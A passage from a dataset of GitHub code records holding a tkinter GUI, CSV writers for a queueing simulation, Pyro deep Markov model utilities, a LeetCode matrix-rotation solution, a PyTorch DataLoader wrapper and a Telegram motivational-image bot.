\r\n elif self.my_var.get()==10:\r\n self.valuesdata6.set(\"Define Parameters For Convolutional Neural Network Classifier\")\r\n self.valuesdata3.set(\"Enter Number Of Training Cycles\")\r\n self.valuesdata4.set(\"Enter Number Of Training Classes\")\r\n self.valuesdata5.set(\"\")\r\n self.x.lower()\r\n self.xx.lift()\r\n self.x1.delete(0,END)\r\n self.x2.delete(0,END)\r\n self.x3.delete(0,END)\r\n \r\n \r\n else:\r\n self.valuesdata6.set(\"ERROR:Report the Bug\")\r\n \r\n \r\n \r\n \r\n def loadwindow(self):\r\n end='//null//'\r\n self.file.write('epoch:'+self.x1.get()+end)\r\n self.file.write('cls:'+self.x2.get()+end)\r\n if self.my_var.get()==5:\r\n self.file.write('neuron:'+self.x3.get()+end)\r\n else:\r\n self.file.write('neuron:'+'-999'+end)\r\n self.file.close()\r\n \r\n self.master.destroy()\r\n root3 = Tk()\r\n root3.resizable(0, 0)\r\n self.obj3 = loading.REG(root3)\r\n root3.mainloop()\r\n \r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n root = Tk()\r\n root.resizable(0, 0)\r\n obj = PARAM(root)\r\n root.mainloop()\r\n \r\n ","repo_name":"rahul-12345/ANN_CNN_FINAL_PROJECT1","sub_path":"ANNCNN/classifier_tool/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10668379416","text":"import csv\n\n\nclass QueueDataCSV:\n\n def __init__(self, path):\n self.path = path\n self.csv_file = None\n self.fieldnames = \\\n [\"MemberID\", \"ArrivedInQueue\", \"ExpectedWait\", \"ExpectedService\", \"WaitInQueue\", \"ArrivedInClass\",\n \"TimeInClass\", \"LeftClass\", \"TotalService\", \"Level\", \"ImmigrantClass\"]\n self.writer = None\n self.start()\n\n def start(self):\n self.csv_file = open(self.path, 'wb')\n self.writer = csv.DictWriter(self.csv_file, fieldnames=self.fieldnames)\n self.writer.writeheader()\n\n def write(self, member_id, arrived_queue, exp_wait, exp_service, waited, arrived_class, class_time, left_class, service_total, level, imm_class):\n self.writer.writerow({\"MemberID\": member_id, \"ArrivedInQueue\": arrived_queue, \"ExpectedWait\": exp_wait, \"ExpectedService\": exp_service, \"WaitInQueue\": waited,\n \"ArrivedInClass\":arrived_class, \"TimeInClass\": class_time, \"LeftClass\": left_class,\n \"TotalService\": service_total, \"Level\": level, \"ImmigrantClass\": imm_class})\n\n def close(self):\n self.csv_file.close()\n\n\nclass QueueWeeklyCSV:\n def __init__(self, path, fieldnames):\n self.path = path\n self.csv_file = None\n self.fieldnames = []\n self.writer = None\n self.start(fieldnames)\n\n def start(self, fieldnames):\n self.fieldnames = fieldnames\n self.csv_file = open(self.path, 'wb')\n self.writer = csv.DictWriter(self.csv_file, fieldnames=self.fieldnames)\n self.writer.writeheader()\n\n def write(self, queue, week): # Pass in queue array\n queue_dict = {\"week\": week}\n for f in self.fieldnames:\n if f != \"week\":\n index = self.fieldnames.index(f) - 1\n queue_dict[f] = queue[index]\n self.writer.writerow(queue_dict)\n\n def close(self):\n self.csv_file.close()\n","repo_name":"ismael-martinez/QueueingNetworkProject","sub_path":"QueueingSimulationCode/CSV.py","file_name":"CSV.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20783605319","text":"import argparse\nimport time\nimport os\nfrom os.path import exists\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import pad_sequence\n\nimport pyro\nimport pyro.distributions as dist\nimport pyro.poutine as poutine\nfrom pyro.distributions import TransformedDistribution\nfrom pyro.distributions.transforms import affine_autoregressive\nfrom pyro.infer import SVI, JitTrace_ELBO, Trace_ELBO, TraceEnum_ELBO, TraceTMC_ELBO, config_enumerate\nfrom pyro.optim import ClippedAdam\n\nclass Emitter(nn.Module):\n \"\"\"\n Parameterizes the Gaussian observation likelihood `p(x_t | z_t)`\n \"\"\"\n def __init__(self, input_dim, z_dim, emission_dim, use_feature_mask_emitter, min_x_scale):\n super().__init__()\n self.min_x_scale = min_x_scale\n # initialize the six linear transformations used in the neural network\n self.lin_gate_z_to_hidden = nn.Linear(z_dim+use_feature_mask_emitter*input_dim, emission_dim)\n self.lin_gate_hidden_to_input = nn.Linear(emission_dim, input_dim)\n self.lin_proposed_mean_z_to_hidden = nn.Linear(z_dim+use_feature_mask_emitter*input_dim, emission_dim)\n self.lin_proposed_mean_hidden_to_input = nn.Linear(emission_dim, input_dim)\n self.lin_sig = nn.Linear(input_dim, input_dim)\n self.lin_z_to_loc = nn.Linear(z_dim+use_feature_mask_emitter*input_dim, input_dim)\n\n self.relu = nn.ReLU()\n self.softplus = nn.Softplus()\n\n def forward(self, z_t, mini_batch_feature_mask_t=None):\n \"\"\"\n Given the latent `z_{t-1}` corresponding to the time step t-1\n we return the mean and scale vectors that parameterize the\n (diagonal) gaussian distribution `p(x_t | z_t)`\n \"\"\"\n if mini_batch_feature_mask_t is None:\n # compute the gating function\n _gate = self.relu(self.lin_gate_z_to_hidden(z_t))\n gate = torch.sigmoid(self.lin_gate_hidden_to_input(_gate))\n # compute the 'proposed mean'\n _proposed_mean = self.relu(self.lin_proposed_mean_z_to_hidden(z_t))\n proposed_mean = self.lin_proposed_mean_hidden_to_input(_proposed_mean)\n # assemble the actual mean used to sample z_t, which mixes a linear transformation\n # of z_{t-1} with the proposed mean modulated by the gating function\n loc = (1 - gate) * self.lin_z_to_loc(z_t) + gate * proposed_mean\n else:\n # compute the gating function\n _gate = self.relu(self.lin_gate_z_to_hidden(torch.cat((z_t, mini_batch_feature_mask_t),dim=-1)))\n gate = torch.sigmoid(self.lin_gate_hidden_to_input(_gate))\n # compute the 'proposed mean'\n _proposed_mean = self.relu(self.lin_proposed_mean_z_to_hidden(torch.cat((z_t, mini_batch_feature_mask_t),dim=-1)))\n proposed_mean = self.lin_proposed_mean_hidden_to_input(_proposed_mean)\n # assemble the actual mean used to sample z_t, which mixes a linear transformation\n # of z_{t-1} with the proposed mean modulated by the gating function\n loc = (1 - gate) * self.lin_z_to_loc(torch.cat((z_t, mini_batch_feature_mask_t),dim=-1)) + gate * proposed_mean\n # compute the scale used to sample z_t, using the proposed mean from\n # above as input the softplus ensures that scale is positive\n scale = self.softplus(self.lin_sig(self.relu(proposed_mean)))\n # add the constant scale to ensure pdf will be upper-bounded\n scale = scale.add(self.min_x_scale)\n # return loc, scale which can be fed into Normal\n return loc, scale\n\nclass GatedTransition(nn.Module):\n \"\"\"\n Parameterizes the gaussian latent transition probability `p(z_t | z_{t-1} ,s)`\n \"\"\"\n\n def __init__(self, z_dim, static_dim, transition_dim):\n super().__init__()\n # initialize the six linear transformations used in the neural network\n self.concat_dim = z_dim + static_dim\n self.lin_gate_z_to_hidden = nn.Linear(self.concat_dim, transition_dim)\n self.lin_gate_hidden_to_z = nn.Linear(transition_dim, z_dim)\n self.lin_proposed_mean_z_to_hidden = nn.Linear(self.concat_dim, transition_dim)\n self.lin_proposed_mean_hidden_to_z = nn.Linear(transition_dim, z_dim)\n self.lin_sig = nn.Linear(z_dim, z_dim)\n self.lin_z_to_loc = nn.Linear(z_dim, z_dim)\n # modify the default initialization of lin_z_to_loc\n # so that it's starts out as the identity function\n self.lin_z_to_loc.weight.data = torch.eye(z_dim)\n self.lin_z_to_loc.bias.data = torch.zeros(z_dim)\n # initialize the three non-linearities used in the neural network\n self.relu = nn.ReLU()\n self.softplus = nn.Softplus()\n\n def forward(self, z_t_1, mini_batch_static):\n \"\"\"\n Given the latent `z_{t-1} and s` corresponding to the time step t-1\n we return the mean and scale vectors that parameterize the\n (diagonal) gaussian distribution `p(z_t | z_{t-1}, s)`\n \"\"\"\n # compute the gating function\n concat = torch.cat((z_t_1, mini_batch_static),dim=1)\n _gate = self.relu(self.lin_gate_z_to_hidden(concat))\n gate = torch.sigmoid(self.lin_gate_hidden_to_z(_gate))\n # compute the 'proposed mean'\n _proposed_mean = self.relu(self.lin_proposed_mean_z_to_hidden(concat))\n proposed_mean = self.lin_proposed_mean_hidden_to_z(_proposed_mean)\n # assemble the actual mean used to sample z_t, which mixes a linear transformation\n # of z_{t-1} with the proposed mean modulated by the gating function\n loc = (1 - gate) * self.lin_z_to_loc(z_t_1) + gate * proposed_mean\n # compute the scale used to sample z_t, using the proposed mean from\n # above as input the softplus ensures that scale is positive\n scale = self.softplus(self.lin_sig(self.relu(proposed_mean)))\n # return loc, scale which can be fed into Normal\n return loc, scale\n\nclass Combiner(nn.Module):\n \"\"\"\n Parameterizes `q(z_t | z_{t-1}, x_{t:T}, m{t:T}, s)`, which is the basic building block\n of the guide (i.e. the variational distribution). The dependence on `x_{t:T} and m_{t:T}` is\n through the hidden state of the RNN (see the PyTorch module `rnn` below)\n \"\"\"\n\n def __init__(self, z_dim, static_dim, rnn_dim):\n super().__init__()\n # initialize the three linear transformations used in the neural network\n self.concat_dim = z_dim + static_dim\n self.lin_z_to_hidden = nn.Linear(self.concat_dim , rnn_dim)\n self.lin_hidden_to_loc = nn.Linear(rnn_dim, z_dim)\n self.lin_hidden_to_scale = nn.Linear(rnn_dim, z_dim)\n # initialize the two non-linearities used in the neural network\n self.tanh = nn.Tanh()\n self.softplus = nn.Softplus()\n\n def forward(self, z_t_1, mini_batch_static, h_rnn):\n \"\"\"\n parameterize the (diagonal) gaussian distribution `q(z_t | z_{t-1}, x_{t:T}, m{t:T}, s)`\n \"\"\"\n # combine the rnn hidden state with a transformed version of z_t_1\n concat = torch.cat((z_t_1, mini_batch_static),dim=1)\n h_combined = 0.5 * (self.tanh(self.lin_z_to_hidden(concat)) + h_rnn)\n # use the combined hidden state to compute the mean used to sample z_t\n loc = self.lin_hidden_to_loc(h_combined)\n # use the combined hidden state to compute the scale used to sample z_t\n scale = self.softplus(self.lin_hidden_to_scale(h_combined))\n # return loc, scale which can be fed into Normal\n return loc, scale\n\n\nclass Predicter_Attention(nn.Module):\n \"\"\"\n Parameterizes the bernoulli observation likelihood `p(y | z_{1:T})`\n \"\"\"\n def __init__(self, z_dim, att_dim, MLP_dims, batch_first=True, use_cuda=True):\n super(Predicter_Attention, self).__init__() \n self.z_dim = z_dim\n self.att_dim = att_dim\n self.MLP_dims = MLP_dims\n\n #Context vector is a parameter to measure the relevance of provided vector for y prediction\n bound = np.sqrt(att_dim)\n self.context_vec = nn.Parameter(torch.zeros(att_dim, 1).uniform_(-bound, bound))\n #In attention framework, z_t's will be projected first\n self.projection_layer = nn.Linear(z_dim, att_dim)\n #There will be an activation function after projection\n self.tanh = nn.Tanh()\n #We use Beta Parameter to control sharpness/smoothness of Softmax function\n self.Beta = torch.Tensor([0.1]).cuda()\n #self.Beta = nn.Parameter(torch.ones(1))\n\n\n #We accepts MLP_dims as strings i.e. \"48-24-12-...\"\n #If MLP_dims is \"-\", it implies that there will be no middle layer\n if MLP_dims == \"-\":\n middle_layers = []\n else:\n middle_layers = MLP_dims.split(\"-\")\n all_MLP_dimensions = [z_dim]\n #all_MLP_dimensions = [z_dim]\n for i in middle_layers:\n all_MLP_dimensions.append(int(i))\n #Last dim will be 1 for binary classification\n all_MLP_dimensions.append(1)\n self.lin_layers_nn = nn.ModuleList()\n for i in range(len(all_MLP_dimensions)-1):\n self.lin_layers_nn.append(nn.Linear(all_MLP_dimensions[i], all_MLP_dimensions[i+1]))\n\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, z, mini_batch_mask):\n #Note: z here has the shape of (N,T,z_dim)\n z_2d = z.reshape(-1, z.shape[2])\n z_projected = self.tanh(self.projection_layer(z_2d)) #Now z_projected has the shape (N*T, att_dim)\n\n #Calculate weights (alpha) of z_projected\n #Below line is used originally (1)\n #alpha = self.Beta * torch.mm(z_projected, self.context_vec) #shape of alpha = (N*T,1)\n\n #Below block (2) is used instead of (1) to test cosine similarity\n cos = nn.CosineSimilarity(dim=1, eps=1e-6)\n alpha = cos(self.context_vec.squeeze(-1).expand(len(z_projected), len(self.context_vec)), z_projected)\n alpha = self.Beta * alpha\n\n alpha = alpha.reshape(z.shape[0], z.shape[1]) #shape of alpha = (N,T)\n alpha = alpha.masked_fill(mini_batch_mask == 0, -1e9)\n alpha = torch.softmax(alpha, dim=-1) #shape of alpha = (N,T)\n\n alpha = alpha.unsqueeze(-1).expand((alpha.shape + (z.shape[2],))) #shape of alpha = (N,T, z_dim)\n #alpha = alpha.unsqueeze(-1).expand((alpha.shape + (self.att_dim,))) #shape of alpha = (N,T, att_dim)\n\n #Multiply z and alpha elementwise\n new_z = z * alpha #shape of new_z = (N,T, z_dim)\n #new_z = z_projected.reshape(z.shape[0], z.shape[1],-1) * alpha\n new_z = new_z.sum(axis=1) #shape of new_z = (N, z_dim)\n\n\n\n input_MLP = new_z\n for i in range(len(self.lin_layers_nn)-1):\n input_MLP = self.relu(self.lin_layers_nn[i](input_MLP))\n\n prob_out = self.sigmoid(self.lin_layers_nn[-1](input_MLP))\n return prob_out.flatten()\n\n# this function takes a torch mini-batch and reverses each sequence\n# (w.r.t. the temporal axis, i.e. axis=1).\ndef reverse_sequences(mini_batch, seq_lengths):\n reversed_mini_batch = torch.zeros_like(mini_batch)\n for b in range(mini_batch.size(0)):\n T = seq_lengths[b]\n time_slice = torch.arange(T - 1, -1, -1, device=mini_batch.device)\n reversed_sequence = torch.index_select(mini_batch[b, :, :], 0, time_slice)\n reversed_mini_batch[b, 0:T, :] = reversed_sequence\n return reversed_mini_batch\n\ndef get_mini_batch_mask(mini_batch, seq_lengths):\n mask = torch.zeros(mini_batch.shape[0:2])\n for b in range(mini_batch.shape[0]):\n mask[b, 0:seq_lengths[b]] = torch.ones(seq_lengths[b])\n return mask\n\ndef batchify(sequences, seq_lengths, sequences_feature_mask, static, y_sequence, y_mask_sequence, max_len=720, batch_size=128, use_feature_mask=True, cuda=True):\n\n keep_index = np.where(np.logical_and(seq_lengths <= max_len, seq_lengths > 0))[0]\n\n static = static[keep_index]\n sequences = sequences[keep_index]\n seq_lengths = seq_lengths[keep_index]\n if sequences_feature_mask is not None:\n sequences_feature_mask = sequences_feature_mask[keep_index]\n if y_sequence is not None:\n y_sequence = y_sequence[keep_index]\n if y_mask_sequence is not None:\n y_mask_sequence = y_mask_sequence[keep_index]\n\n\n N_data = len(seq_lengths)\n N_mini_batches = int(N_data / batch_size +\n int(N_data % batch_size > 0))\n\n shuffled_indices = np.arange(N_data)\n\n batches = []\n\n for which_mini_batch in range(N_mini_batches):\n mini_batch_start = (which_mini_batch * batch_size)\n mini_batch_end = np.min([(which_mini_batch + 1) * batch_size, N_data])\n mini_batch_indices = shuffled_indices[mini_batch_start:mini_batch_end]\n \n batches.append(get_mini_batch(mini_batch_indices, sequences, seq_lengths, sequences_feature_mask, static, y_sequence, y_mask_sequence, keep_index, use_feature_mask=use_feature_mask, cuda=cuda))\n\n return batches\n\ndef get_mini_batch(mini_batch_indices, sequences, seq_lengths, sequences_feature_mask=None, static=None, y_sequence=None, y_mask_sequence=None, indices_dataset=None, use_feature_mask=False, cuda=False):\n '''\n IMPORTANT NOTE: Currently, we are merging mini_batch_reversed and mini_batch_feature_mask_reversed \n if sequences_feature_mask exists!\n '''\n # get the sequence lengths of the mini-batch\n #sorted_seq_lengths and sorted_mini_batch_indices\n seq_lengths = seq_lengths[mini_batch_indices]\n seq_lengths = torch.from_numpy(seq_lengths).type('torch.LongTensor')\n\n # sort the sequence lengths\n _, sorted_seq_length_indices = torch.sort(seq_lengths)\n sorted_seq_length_indices = sorted_seq_length_indices.flip(0)\n sorted_seq_lengths = seq_lengths[sorted_seq_length_indices]\n sorted_mini_batch_indices = mini_batch_indices[sorted_seq_length_indices.numpy()]\n\n # compute the length of the longest sequence in the mini-batch\n T_max = torch.max(seq_lengths)\n # this is the sorted mini-batch\n mini_batch = list(map(lambda x: torch.from_numpy(x[:T_max,:]).type('torch.DoubleTensor') , sequences[sorted_mini_batch_indices]))\n mini_batch = pad_sequence(mini_batch, batch_first=True).type('torch.DoubleTensor')\n #This is the sorted mini_batch_static\n mini_batch_static = static[sorted_mini_batch_indices]\n mini_batch_static = torch.from_numpy(mini_batch_static).type('torch.DoubleTensor')\n\n # get mask for mini-batch\n mini_batch_mask = get_mini_batch_mask(mini_batch, sorted_seq_lengths)\n #get the y values (mortality labels) of mini-batch\n if y_sequence is None:\n y_mini_batch = None\n else:\n y_mini_batch = y_sequence[sorted_mini_batch_indices]\n y_mini_batch = torch.from_numpy(y_mini_batch).type('torch.DoubleTensor')\n\n #get y mask values (for semi-supervised learning)\n if y_mask_sequence is None:\n y_mask_mini_batch = None\n else:\n y_mask_mini_batch = y_mask_sequence[sorted_mini_batch_indices]\n y_mask_mini_batch = torch.from_numpy(y_mask_mini_batch).type('torch.DoubleTensor')\n\n # Feature_mask not used for ELBO as masking or guide\n if sequences_feature_mask is None: \n mini_batch_feature_mask = None\n mini_batch_reversed_with_mask = reverse_sequences(mini_batch, sorted_seq_lengths)\n # Feature mask only used for ELBO as masking\n elif sequences_feature_mask is not None and not use_feature_mask:\n #This is the sorted mini_batch_feature_mask\n mini_batch_feature_mask = list(map(lambda x: torch.from_numpy(x[:T_max,:]).type('torch.DoubleTensor') , sequences_feature_mask[sorted_mini_batch_indices]))\n mini_batch_feature_mask = pad_sequence(mini_batch_feature_mask, batch_first=True).type('torch.DoubleTensor')\n \n mini_batch_reversed_with_mask = reverse_sequences(mini_batch, sorted_seq_lengths)\n #Feature mask will be used for both ELBO and guide \n else:\n #This is the sorted mini_batch_feature_mask\n mini_batch_feature_mask = list(map(lambda x: torch.from_numpy(x[:T_max,:]).type('torch.DoubleTensor') , sequences_feature_mask[sorted_mini_batch_indices]))\n mini_batch_feature_mask = pad_sequence(mini_batch_feature_mask, batch_first=True).type('torch.DoubleTensor')\n # this is the sorted mini-mini_batch_feature_mask in reverse temporal order\n mini_batch_reversed_with_mask = reverse_sequences(torch.cat((mini_batch, mini_batch_feature_mask),dim=-1), sorted_seq_lengths)\n\n # cuda() here because need to cuda() before packing\n if cuda:\n mini_batch = mini_batch.cuda()\n mini_batch_static = mini_batch_static.cuda()\n mini_batch_mask = mini_batch_mask.cuda()\n if y_mini_batch is not None:\n y_mini_batch = y_mini_batch.cuda()\n if y_mask_mini_batch is not None:\n y_mask_mini_batch = y_mask_mini_batch.cuda()\n mini_batch_reversed_with_mask = mini_batch_reversed_with_mask.cuda()\n if mini_batch_feature_mask is not None:\n mini_batch_feature_mask = mini_batch_feature_mask.cuda()\n \n # do sequence packing\n mini_batch_reversed_with_mask = nn.utils.rnn.pack_padded_sequence(mini_batch_reversed_with_mask,\n sorted_seq_lengths,\n batch_first=True)\n\n return mini_batch_static, mini_batch, mini_batch_reversed_with_mask, mini_batch_mask, sorted_seq_lengths, mini_batch_feature_mask, y_mini_batch, y_mask_mini_batch, indices_dataset[sorted_mini_batch_indices]\n\n\n\ndef pad_and_reverse(rnn_output, seq_lengths):\n rnn_output, _ = nn.utils.rnn.pad_packed_sequence(rnn_output, batch_first=True)\n reversed_output = reverse_sequences(rnn_output, seq_lengths)\n return reversed_output","repo_name":"oezyurty/AttDMM","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":17808,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"38393405110","text":"# You are given an n x n 2D matrix representing an image, rotate the image by 90 degrees (clockwise).\n# You have to rotate the image in-place, \n# which means you have to modify the input 2D matrix directly. DO NOT allocate another 2D matrix and do the rotation.\n\n# tips:\n# 走訪矩陣左上半部的元素,然後順時鐘交換四個角的元素位置\n# 或轉置+水平翻轉,水平翻轉+轉置會變成矩陣逆時鐘轉90度\n# 或垂直翻轉+轉置\n\n\n# blind spot:\n# 走訪矩陣左上半部的元素需要考慮奇數情況,用n%2\n# 轉置需要只走嚴格上三角矩陣,for j in range(i+1, n)\n\n# first try: 交換四個角的位置\nclass Solution(object):\n def rotate(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: None Do not return anything, modify matrix in-place instead.\n \"\"\"\n n = len(matrix[0])\n \n # 走訪矩陣位於左上角的元素\n for i in range(n//2 + n % 2): # + n % 2是為了在長度為奇數的矩陣,走訪行或列在中間的元素\n for j in range(n//2):\n # 四個角順時鐘交換位置\n temp = matrix[i][j] # 存左上角\n matrix[i][j] = matrix[n-1-j][i] # 左下覆蓋左上\n matrix[n-1-j][i] = matrix[n-1-i][n-1-j] # 右下覆蓋左下\n matrix[n-1-i][n-1-j] = matrix[j][n-1-i] # 右上覆蓋右下\n matrix[j][n-1-i] = temp # 左上覆蓋右上\n\n# first try: 轉置+水平翻轉\nclass Solution(object):\n def rotate(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: None Do not return anything, modify matrix in-place instead.\n \"\"\"\n # self.transpose(matrix)\n # self.horizontal_reflect(matrix)\n\n self.vertical_reflect(matrix)\n self.transpose(matrix)\n \n def transpose(self, matrix):\n n = len(matrix)\n # range(i+1, n)只走訪嚴格上三角矩陣(不含對角線)的元素\n for i in range(n):\n for j in range(i+1, n):\n matrix[i][j], matrix[j][i] = matrix[j][i], matrix[i][j]\n \n def horizontal_reflect(self, matrix):\n n = len(matrix)\n # range(n // 2)只走訪左半邊的元素\n for i in range(n):\n for j in range(n // 2):\n matrix[i][j], matrix[i][n-1-j] = matrix[i][n-1-j], matrix[i][j]\n\n def vertical_reflect(self, matrix):\n n = len(matrix)\n for i in range(n // 2):\n for j in range(n):\n matrix[i][j], matrix[n-1-i][j] = matrix[n-1-i][j], matrix[i][j]\n ","repo_name":"hcygeorge/my-leetcode","sub_path":"array/medium/48. Rotate Image.py","file_name":"48. Rotate Image.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11675609639","text":"from torch import Tensor as TorchTensor\nfrom torch.utils.data import DataLoader as TorchDataLoader\nfrom torch.utils.data import Dataset as TorchDataset\n\nfrom mf.base.data.dataloader import DataLoader as DataLoaderBase\nfrom mf.ports.torch_port.tensor_impl import TensorImpl as Tensor\n\n\nclass DataLoader(DataLoaderBase):\n\n def __init__(self, dataset, batch_size=1, shuffle: bool = False, num_workers: int = 0, pin_memory: bool = False):\n super().__init__(dataset, batch_size, shuffle, num_workers, pin_memory)\n\n self.__dataloader = TorchDataLoader(DatasetUnwrap(dataset), batch_size=batch_size, shuffle=shuffle,\n num_workers=num_workers, pin_memory=pin_memory)\n\n def __iter__(self):\n return Iterator(self.__dataloader.__iter__())\n\n\nclass DatasetUnwrap(TorchDataset):\n def __init__(self, dataset):\n super().__init__()\n self.dataset = dataset\n\n def __getitem__(self, idx):\n data = self.dataset[idx]\n data = unwrap_tensor(data)\n return data\n\n def __len__(self):\n return len(self.dataset)\n\n\nclass Iterator:\n def __init__(self, raw_iterator):\n self.raw_iterator = raw_iterator\n\n def __next__(self):\n try:\n data = self.raw_iterator.__next__()\n data = wrap_tensor(data)\n return data\n except StopIteration:\n raise StopIteration\n\n\ndef unwrap_tensor(data):\n if isinstance(data, tuple):\n data = tuple([x.__raw_tensor__ for x in data])\n elif isinstance(data, list):\n data = list([x.__raw_tensor__ for x in data])\n elif isinstance(data, Tensor):\n data = data.__raw_tensor__\n else:\n raise NotImplementedError\n return data\n\n\ndef wrap_tensor(data):\n if isinstance(data, tuple):\n data = tuple([Tensor(__raw_tensor__=x) for x in data])\n elif isinstance(data, list):\n data = list([Tensor(__raw_tensor__=x) for x in data])\n elif isinstance(data, TorchTensor):\n data = Tensor(__raw_tensor__=data)\n else:\n raise NotImplementedError\n return data\n","repo_name":"elyar-adil/magicflow","sub_path":"mf/ports/torch_port/data/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75058881067","text":"import logging\nimport multiprocessing\n\nlog_level = logging.INFO\nlogger = logging.getLogger(__name__)\nlogger.setLevel(log_level)\nch = logging.StreamHandler()\nch.setLevel(log_level)\nformatter = logging.Formatter('%(asctime)s - %(processName)s - %(threadName)s - %(levelname)s - %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\nnumber_of_cores = multiprocessing.cpu_count()\nnumber_of_threads = 5\nnum_of_links = 1000\nurl = \"https://edition.cnn.com/\"\n\"\"\"\nI have 8 cores, so I did not describe the behavior when the number of links is divided with the remainder.\nThis problem could be solved by adding the rest of the links to the last thread along with the main chunk.\nPlease keep this in mind.\n\"\"\"\nchunk_size = num_of_links // number_of_cores\n","repo_name":"chugunovyar/gil_demo","sub_path":"configurator.py","file_name":"configurator.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8278236407","text":"from aiogram.types import InputFile\n\nfrom cfg import TOKEN, ADMIN_NAME, ADMIN_ID\nimport random\nfrom aiogram import Bot, types\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram.utils import executor\nfrom aiogram.dispatcher.filters import Text\nfrom datetime import datetime ######################\n\nbot = Bot(token=TOKEN)\ndp = Dispatcher(bot)\nlistUser = []\ndata = []\nadminName = ADMIN_NAME\nadminId = ADMIN_ID\n\n\n@dp.message_handler(commands=['start'])\nasync def cmd_start(msg: types.Message):\n if msg.chat.username not in listUser:\n listUser.append(msg.chat.username)\n with open(\"users.txt\", \"w\") as file:\n for line in listUser:\n file.write(','+line)\n user = open('users/'+msg.chat.username+'.txt', 'w')\n user.write(str(msg.from_user.id))\n user.close()\n keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\n time_now = datetime.now().strftime('%H:%M') #######\n print(msg.chat.username + \" начал использовать бота в [\" + time_now + \"]\") #######\n time_now = datetime.now().strftime('%H:%M')\n test = open('file.txt', 'a')\n test.write(\"\\n\" + msg.chat.username + \" начал использовать бота в [\" + time_now + \"]\")\n test.close()\n buttons = [\"Замотивируй меня\", \"Помоги\"]\n keyboard.add(*buttons)\n await msg.answer(\n \"Привет, \" + msg.chat.username + '!\\nЯ мотивирующий бот!\\nНапиши \"Замотивируй меня\", и я выдам тебе мотивашку!',\n parse_mode=\"HTML\", reply_markup=keyboard)\n\n\n@dp.message_handler(Text(equals=\"Замотивируй меня\"))\nasync def with_puree(msg: types.Message):\n time_now = datetime.now().strftime('%H:%M') #######\n print(\"[\" + time_now + \"] \" + msg.chat.username + \": \" + msg.text)\n test = open('logs.txt', 'a') ######\n test.write(\"\\n[\" + time_now + \"] \" + msg.chat.username + \": \" + msg.text) ########\n test.close() #############\n user = open('users/' + msg.chat.username + '.txt', 'w')\n user.write(str(msg.from_user.id))\n user.close()\n num = str(random.randint(0, 62))\n photo = InputFile(path_or_bytesio='assets/' + num + '.jpg')\n await bot.send_photo(chat_id=msg.chat.id, photo=photo)\n\n\n@dp.message_handler(Text(equals=\"Помоги\"))\nasync def process_help_command(msg: types.Message):\n time_now = datetime.now().strftime('%H:%M') ######\n print(\"[\" + time_now + \"] \" + msg.chat.username + \": \" + msg.text)\n test = open('logs.txt', 'a') ######\n test.write(\"\\n[\" + time_now + \"] \" + msg.chat.username + \": \" + msg.text) ######\n test.close() ##############\n await msg.reply('Напиши \"Замотивируй меня\", и я выдам тебе мотивашку!', parse_mode=\"HTML\")\n\n\n@dp.message_handler(Text(equals=\"Список\")) ##################\nasync def echo_message(msg: types.Message):\n time_now = datetime.now().strftime('%H:%M') ######\n print(\"Пользователь \" + msg.chat.username + \"(\" + str(\n msg.from_user.id) + \") обратился ко мне за списком в [\" + time_now + \"]\")\n if msg.from_user.id == 933846611 and msg.chat.username == adminName:\n await msg.reply(\n 'Приветствую, Г-н Администратор!\\nВот список пользователей, использовавших меня: ' + str(listUser),\n parse_mode=\"HTML\")\n else:\n await msg.reply('Ты не администратор этого бота! Тебе нельзя использовать эту команду!',\n parse_mode=\"HTML\")\n\n@dp.message_handler(commands=\"send\") ##################\nasync def echo_message(msg: types.Message):\n #time_now = datetime.now().strftime('%H:%M') ######\n if msg.from_user.id == 933846611 and msg.chat.username == adminName:\n arg = msg.get_args()\n text = arg.split(\" \")\n string = ''\n userN = text[0]\n #print(text)\n text.pop(0)\n for el in text:\n string += el + ' '\n file = open('users/'+str(userN)+'.txt')\n dataID = file.read()\n file.close()\n #print(dataID)\n await bot.send_message(chat_id=dataID, text = string)\n else:\n await bot.send_message(chat_id=msg.from_user.id, text=\"Ты черт, а не админ!\")\n\n#############\n\n@dp.message_handler() ##################\nasync def echo_message(msg: types.Message):\n time_now = datetime.now().strftime('%H:%M')\n if msg.chat.username not in listUser:\n listUser.append(msg.chat.username)\n print(\"[\" + time_now + \"] \" + msg.chat.username + \": \" + msg.text)\n test = open('logs.txt', 'a')\n test.write(\"\\n[\" + time_now + \"] \" + msg.chat.username + \": \" + msg.text)\n test.close()\n\n #############\n\n\n\ndef bot():\n file = open(\"users.txt\", \"r\")\n dataList = file.read()\n listUser = dataList.split(\",\")\n file.close()\n print(listUser)\n executor.start_polling(dp)","repo_name":"Dissmor/Laba-2_OPD","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"720549755","text":"import os, sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\")))\nfrom utils import get_data\nimport mxnet as mx\nimport numpy as np\nimport logging\n\n# whether to demo model-parallelism + data parallelism\ndemo_data_model_parallelism = True\n\nif demo_data_model_parallelism:\n contexts = [[mx.context.gpu(0), 